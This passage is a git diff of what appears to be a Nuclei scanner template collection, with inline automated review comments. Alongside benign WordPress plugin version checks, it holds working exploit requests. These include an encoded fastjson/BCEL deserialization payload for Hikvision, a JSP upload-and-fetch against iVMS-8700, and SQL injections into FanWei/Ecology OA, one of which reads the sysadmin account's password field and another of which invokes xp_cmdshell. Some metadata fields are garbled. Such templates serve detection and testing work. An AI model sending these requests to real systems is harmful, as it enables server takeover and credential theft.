@@ -0,0 +1,59 @@ +id: slider-comparison-image-before-and-after + +info: + name: > + Slider comparison image before and after <= 0.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14ab5d7c-ab46-4a53-b0d2-8b331e204cf3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/slider-comparison-image-before-and-after/" + google-query: inurl:"/wp-content/plugins/slider-comparison-image-before-and-after/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,slider-comparison-image-before-and-after,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/slider-comparison-image-before-and-after/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "slider-comparison-image-before-and-after" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.3') \ No newline at end of file diff --git a/poc/other/tracking-code-manager-44229e301b00fab19a97495d12bba74f.yaml b/poc/other/tracking-code-manager-44229e301b00fab19a97495d12bba74f.yaml new file mode 100644 index 0000000000..12293d4144 --- /dev/null +++ b/poc/other/tracking-code-manager-44229e301b00fab19a97495d12bba74f.yaml 
@@ -0,0 +1,59 @@ +id: tracking-code-manager-44229e301b00fab19a97495d12bba74f + +info: + name: > + Tracking Code Manager <= 2.2.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9bd1fe45-8518-429b-94d3-cc0ea06ca1b4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/tracking-code-manager/" + google-query: inurl:"/wp-content/plugins/tracking-code-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,tracking-code-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tracking-code-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tracking-code-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.0') \ No newline at end of file diff --git a/poc/php/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml b/poc/php/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml new file mode 100644 index 0000000000..255f27faba --- /dev/null +++ b/poc/php/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml 
@@ -0,0 +1,59 @@ +id: custom-css-js-php-38595c300b5439c3ff06f9de9b42f302 + +info: + name: > + Custom CSS, JS & PHP <= 2.0.7 - Cross-Site Request Forgery Bypass + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d21dc02f-789c-497e-9d01-02fa49bf9e30?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/custom-css-js-php/" + google-query: inurl:"/wp-content/plugins/custom-css-js-php/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,custom-css-js-php,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-css-js-php/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-css-js-php" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.7') \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 0ebd67934b..7e328a8b1b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml 
@@ -1,27 +1,50 @@ id: HIKVISION info: - name: HIKVISION - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: - fofa-query: app="HIKVISION-综合安防管理平台" - hunter-query: web.title="综合安防管理平台" + fofa-query: icon_hash="-911494769" + hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" +variables: + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + http: - raw: - | - POST /bic/ssoService/v1/applyCT HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - Testcmd: whoami - - {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + Content-Type: image/jpeg + + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- + + - | + GET /eps/upload/{{name}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: name + json: + - ".data.resourceUuid" + internal: true matchers: - type: 
word words: - - "nt authority\\system" + - '{{randstr}}' diff --git a/poc/remote_code_execution/woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c.yaml b/poc/remote_code_execution/woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c.yaml new file mode 100644 index 0000000000..317cfa265a --- /dev/null +++ b/poc/remote_code_execution/woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c.yaml @@ -0,0 +1,59 @@ +id: woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c + +info: + name: > + WooCommerce Photo Reviews Premium <= 1.3.13.2 - Authentication Bypass to Account Takeover and Privilege Escalation + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e2d370-a716-4d6b-8e23-74db2fbd0760?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woocommerce-photo-reviews/" + google-query: inurl:"/wp-content/plugins/woocommerce-photo-reviews/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woocommerce-photo-reviews,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-photo-reviews/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-photo-reviews" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.13.2') \ No newline at end of file diff --git a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 8c93d2bd55..4e7ede529c 100644 --- a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml 
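Review bot: The new body of `Hikvision_applyCT_RCE.yaml` replaces the applyCT check with an iVMS-8700 upload check, so the file name no longer matches the content and the former detection is dropped rather than moved; the upload check already exists as `poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml` (L88), so this looks like an accidental overwrite that should be reverted or renamed. The `info` edits are half-applied — `name: HHIKVISION`, `author: zerZero Trust …`, `Platfor` — and read like a botched find-and-replace. The check uploads a `.jsp` that the server stores under `/eps/upload/` and then fetches it, so a positive result leaves an executable artifact on the target; add `intrusive` to the tags and a comment such as `# NOTE: leaves an uploaded .jsp on the host; remove it after verification`. `Content-Length: 184` is hard-coded against a `{{randstr}}` body; whether nuclei recomputes the header for raw requests should be confirmed before relying on it.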
+++ b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml @@ -1,39 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" + http: - raw: - | - POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate Connection: close - Content-Length: 259 - Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 - Accept-Encoding: gzip - - --e64bdf16c554bbc109cecef6451c26a4 - Content-Disposition: form-data; name="Filedata"; filename="test.php" - Content-Type: image/jpeg - - - - --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && len(body) > 0' + - 'contains(body_1, "c4ca")' condition: and - -# /attachment/3466744850/xxx.php diff --git a/poc/sql/ecology-sqli2.yaml b/poc/sql/ecology-sqli2.yaml index 37e6ab9baf..eb07a123e2 100644 --- a/poc/sql/ecology-sqli2.yaml +++ b/poc/sql/ecology-sqli2.yaml 
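Review bot: The rewritten description ends in a stray hyphen (`obtain sensitive information-`) and the generic `id: FanWei` survives although the check changed from an E-Office upload to an HrmCareerApplyPerView injection; the same id also appears in the copy at L85, so it is neither descriptive nor unique. This hunk is identical to the one at L85 under `poc/sql_injection/`, i.e. the same template is now maintained in two directories and one copy should go. A specific id such as `fanwei-ecology-hrmcareerapplyperview-sqli` (constructed) and a description like `HrmCareerApplyPerView.jsp passes the id parameter into a SQL query unsanitised, allowing database contents to be read.` would fix both. The matcher `contains(body_1, "c4ca")` accepts four characters as evidence of a finding, which is a thin threshold for a high-severity result.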
@@ -10,7 +10,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=exec%20xp_cmd$shell%20%27whoami%27;" + - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=Select%20*%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27" matchers-condition: and matchers: - type: status @@ -18,7 +18,7 @@ requests: - 200 - type: word words: - - "output" - - "mssqlserver" + - "lastname" + - "password" part: body condition: and \ No newline at end of file diff --git a/poc/sql/error-based-sqli.yaml b/poc/sql/error-based-sqli.yaml index ff8438ccbf..b73d67fe17 100644 --- a/poc/sql/error-based-sqli.yaml +++ b/poc/sql/error-based-sqli.yaml @@ -7,7 +7,7 @@ info: description: | Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, or to override valuable ones, or even to execute dangerous system level commands on the database host. - This is accomplished by the application taking user input and combining it with static parameters to build an SQL query. + This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . tags: sqli,error,dast http: @@ -17,7 +17,6 @@ http: payloads: injection: - - "sleep(5)#" - "sleep(10)#" fuzzing: @@ -25,7 +24,9 @@ http: type: postfix fuzz: - "{{injection}}" - + + stop-at-first-match: true + matchers-condition: and matchers: - type: dsl dsl: diff --git a/poc/sql/html5-video-player-1d6d633d5a9085295638ff332db34930.yaml b/poc/sql/html5-video-player-1d6d633d5a9085295638ff332db34930.yaml new file mode 100644 index 0000000000..2a2cd63adb --- /dev/null +++ b/poc/sql/html5-video-player-1d6d633d5a9085295638ff332db34930.yaml 
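Review bot: After this change a positive ecology-sqli2 result means `lastname` and `password` values from `HrmResourceManager` are echoed into scanner output, which the template does not disclose anywhere; add a description such as `Verifies the injection by reading the sysadmin row; output contains credential material and must be handled as sensitive.` and note that the file still uses the legacy `requests:` key. In error-based-sqli the only wording edit inserts a space before the full stop (`SQL query .`), which is a regression, and after the removal of `sleep(5)#` the template named error-based carries only the time-based `sleep(10)#` payload; if the dsl matcher outside the hunk times the response, as the payload suggests, a comment saying so would prevent misreading. Both hunks are repeated byte-for-byte at L86 under `poc/sql_injection/`.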
@@ -0,0 +1,59 @@ +id: html5-video-player-1d6d633d5a9085295638ff332db34930 + +info: + name: > + HTML5 Video Player – mp4 Video Player Plugin and Block <= 2.5.34 - Missing Authorization to Authenticated (Subscriber+) Limited Options Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc3f308-d1e1-430b-bccd-168c0972fe7c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,html5-video-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.34') \ No newline at end of file diff --git a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 8c93d2bd55..4e7ede529c 100644 --- a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml 
@@ -1,39 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" + http: - raw: - | - POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate Connection: close - Content-Length: 259 - Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 - Accept-Encoding: gzip - - --e64bdf16c554bbc109cecef6451c26a4 - Content-Disposition: form-data; name="Filedata"; filename="test.php" - Content-Type: image/jpeg - - - - --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && len(body) > 0' + - 'contains(body_1, "c4ca")' condition: and - -# /attachment/3466744850/xxx.php diff --git a/poc/sql_injection/ecology-sqli2.yaml b/poc/sql_injection/ecology-sqli2.yaml index 37e6ab9baf..eb07a123e2 100644 --- a/poc/sql_injection/ecology-sqli2.yaml +++ b/poc/sql_injection/ecology-sqli2.yaml 
@@ -10,7 +10,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=exec%20xp_cmd$shell%20%27whoami%27;" + - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=Select%20*%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27" matchers-condition: and matchers: - type: status @@ -18,7 +18,7 @@ requests: - 200 - type: word words: - - "output" - - "mssqlserver" + - "lastname" + - "password" part: body condition: and \ No newline at end of file diff --git a/poc/sql_injection/error-based-sqli.yaml b/poc/sql_injection/error-based-sqli.yaml index ff8438ccbf..b73d67fe17 100644 --- a/poc/sql_injection/error-based-sqli.yaml +++ b/poc/sql_injection/error-based-sqli.yaml @@ -7,7 +7,7 @@ info: description: | Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, or to override valuable ones, or even to execute dangerous system level commands on the database host. - This is accomplished by the application taking user input and combining it with static parameters to build an SQL query. + This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . tags: sqli,error,dast http: @@ -17,7 +17,6 @@ http: payloads: injection: - - "sleep(5)#" - "sleep(10)#" fuzzing: @@ -25,7 +24,9 @@ http: type: postfix fuzz: - "{{injection}}" - + + stop-at-first-match: true + matchers-condition: and matchers: - type: dsl dsl: diff --git a/poc/ssrf/generic-ssrf.yaml b/poc/ssrf/generic-ssrf.yaml index 6276c76b83..605de026aa 100644 --- a/poc/ssrf/generic-ssrf.yaml +++ b/poc/ssrf/generic-ssrf.yaml @@ -18,4 +18,4 @@ requests: part: interactsh_protocol # Confirms the DNS Interaction words: - "http" - - "dns" + - "dns" \ No newline at end of file diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml index cd961f6e81..e86e8491d1 100644 
--- a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml
+++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml
